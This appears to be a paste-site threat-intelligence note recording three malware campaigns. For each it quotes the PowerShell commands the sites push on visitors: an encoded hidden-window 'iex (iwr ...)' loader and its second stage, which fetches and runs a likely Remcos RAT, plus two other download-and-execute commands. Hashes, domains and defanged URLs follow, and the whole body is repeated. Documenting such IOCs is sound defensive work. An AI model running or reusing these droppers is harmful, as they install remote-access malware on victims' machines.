New-Campaign

1] https[:]//human-bot-view[.]chalnlizt[.]org:

	[+] PowerShell Command:
	
			PowerShell.exe -eC cABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwAgAEgAaQBkAGQAZQBuACAALQBjACAAIgBpAGUAeAAgACgAaQB3AHIAIABoAHQAdABwAHMAOgAvAC8AYgBjAC4AYQB4AC8AMgA1AFcAZQBMADQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkALgBDAG8AbgB0AGUAbgB0ACIA
	
	[+] PowerShell Decoded Command:
	
			PowerShell -W Hidden -c "iex (iwr https[:]//bc[.]ax/25WeL4 -UseBasicParsing).Content"
	
	[+]2nd stage URL: 
		
		- https[:]//bc[.]ax/25WeL4 (Below is content of the URL)
		
				$webClient = New-Object System.Net.WebClient
				$url1 = "https[:]//challinksch[.]com/docpzip[.]zip"
				$zipPath1 = "$env:TEMP\mfiles.zip"
				$webClient.DownloadFile($url1, $zipPath1)
				$extractPath1 = "$env:TEMP\mfile"
				Expand-Archive -Path $zipPath1 -DestinationPath $extractPath1
				Start-Process -FilePath $env:TEMP\mfile\ixploren.exe
	
	[+] IOCs
	
		[-] SHA-256: 
		
				4dfd03f81e75f12e8fd5ab2a4cbddc7ee9c695ff271390bad05538e04597b811 - docpzip.zip
				08c7fb6067acc8ac207d28ab616c9ea5bc0d394956455d6a3eecb73f8010f7a2 - ixploren.exe (Highly Possible Remcos RAT)
				a6846a51472a6a42a4f2d4cfb4a79980ebe6b01b80da4ac4ca4a5c3fb022be1e - msimg32.dll (Suspicious DLL)
		
		[-] Domains:
			
				human-bot-view[.]chalnlizt[.]org
				challinksch[.]com
				bc[.]ax
			
		[-] URLs:
			
				https[:]//human-bot-view[.]chalnlizt[.]org
				https[:]//challinksch[.]com/docpzip[.]zip
				https[:]//bc[.]ax/25WeL4

2] https[:]//challinksch[.]com:

	[+] PowerShell Command:
	
			PowerShell -Command "(New-Object Net.WebClient).DownloadFile('https[:]//the[.]earth[.]li/~sgtatham/putty/latest/w64/putty[.]exe', $env:TEMP + '\CaptionBot.exe'); Start-Process $env:TEMP'\CaptionBot.exe'"

	[+] IOC's
		
		[-] Domain:
		
				challinksch[.]com
			
		[-] URL:

				https[:]//challinksch[.]com

3] https[:]//generete-nav-correios[.]space-to-rent[.]com:

	[+] PowerShell Command:
	
			PowerShell -W Hidden -Command "Invoke-WebRequest -Uri 'http[:]//ec2-15-228-128-188[.]sa-east-1[.]compute[.]amazonaws[.]com/modecorreiosrastreio[.]msi' -OutFile $env:TEMP\modecorreiosrastreio.msi; Start-Process $env:TEMP\modecorreiosrastreio.msi"
	
	[+] IOC's
	
		[-] Domains:
			
				ec2-15-228-128-188[.]sa-east-1[.]compute[.]amazonaws[.]com
			
		[-] IP:
		
				15[.]228[.]128[.]188
			
		[-] URL:
		
				http[:]//ec2-15-228-128-188[.]sa-east-1[.]compute[.]amazonaws[.]com/modecorreiosrastreio[.]msi

1] https[:]//human-bot-view[.]chalnlizt[.]org:

[+] PowerShell Command:
	
			PowerShell.exe -eC cABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwAgAEgAaQBkAGQAZQBuACAALQBjACAAIgBpAGUAeAAgACgAaQB3AHIAIABoAHQAdABwAHMAOgAvAC8AYgBjAC4AYQB4AC8AMgA1AFcAZQBMADQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkALgBDAG8AbgB0AGUAbgB0ACIA
	
	[+] PowerShell Decoded Command:
	
			PowerShell -W Hidden -c "iex (iwr https[:]//bc[.]ax/25WeL4 -UseBasicParsing).Content"
	
	[+]2nd stage URL: 
		
		- https[:]//bc[.]ax/25WeL4 (Below is content of the URL)
		
				$webClient = New-Object System.Net.WebClient
				$url1 = "https[:]//challinksch[.]com/docpzip[.]zip"
				$zipPath1 = "$env:TEMP\mfiles.zip"
				$webClient.DownloadFile($url1, $zipPath1)
				$extractPath1 = "$env:TEMP\mfile"
				Expand-Archive -Path $zipPath1 -DestinationPath $extractPath1
				Start-Process -FilePath $env:TEMP\mfile\ixploren.exe
	
	[+] IOCs
	
		[-] SHA-256: 
		
				4dfd03f81e75f12e8fd5ab2a4cbddc7ee9c695ff271390bad05538e04597b811 - docpzip.zip
				08c7fb6067acc8ac207d28ab616c9ea5bc0d394956455d6a3eecb73f8010f7a2 - ixploren.exe (Highly Possible Remcos RAT)
				a6846a51472a6a42a4f2d4cfb4a79980ebe6b01b80da4ac4ca4a5c3fb022be1e - msimg32.dll (Suspicious DLL)
		
		[-] Domains:
			
				human-bot-view[.]chalnlizt[.]org
				challinksch[.]com
				bc[.]ax
			
		[-] URLs:
			
				https[:]//human-bot-view[.]chalnlizt[.]org
				https[:]//challinksch[.]com/docpzip[.]zip
				https[:]//bc[.]ax/25WeL4

2] https[:]//challinksch[.]com:

[+] PowerShell Command:
	
			PowerShell -Command "(New-Object Net.WebClient).DownloadFile('https[:]//the[.]earth[.]li/~sgtatham/putty/latest/w64/putty[.]exe', $env:TEMP + '\CaptionBot.exe'); Start-Process $env:TEMP'\CaptionBot.exe'"

[+] IOC's
		
		[-] Domain:
		
				challinksch[.]com
			
		[-] URL:

https[:]//challinksch[.]com

3] https[:]//generete-nav-correios[.]space-to-rent[.]com:

[+] PowerShell Command:
	
			PowerShell -W Hidden -Command "Invoke-WebRequest -Uri 'http[:]//ec2-15-228-128-188[.]sa-east-1[.]compute[.]amazonaws[.]com/modecorreiosrastreio[.]msi' -OutFile $env:TEMP\modecorreiosrastreio.msi; Start-Process $env:TEMP\modecorreiosrastreio.msi"
	
	[+] IOC's
	
		[-] Domains:
			
				ec2-15-228-128-188[.]sa-east-1[.]compute[.]amazonaws[.]com
			
		[-] IP:
		
				15[.]228[.]128[.]188
			
		[-] URL:
		
				http[:]//ec2-15-228-128-188[.]sa-east-1[.]compute[.]amazonaws[.]com/modecorreiosrastreio[.]msi

comments powered by Disqus

Title	Time
swdefrgtyh	5 minutes
aqswdefrgtyh	1 hour
sdffdsfdsdfsfsdsfd	1 hour
Watch Yulia Starodubtseva...	1 hour
New-Campaign	1 hour
Sabalenka - Keys Live Str...	2 hours
Watch Aryna Sabalenka - M...	2 hours

Paste4BTC

Raw paste:

Recent pastes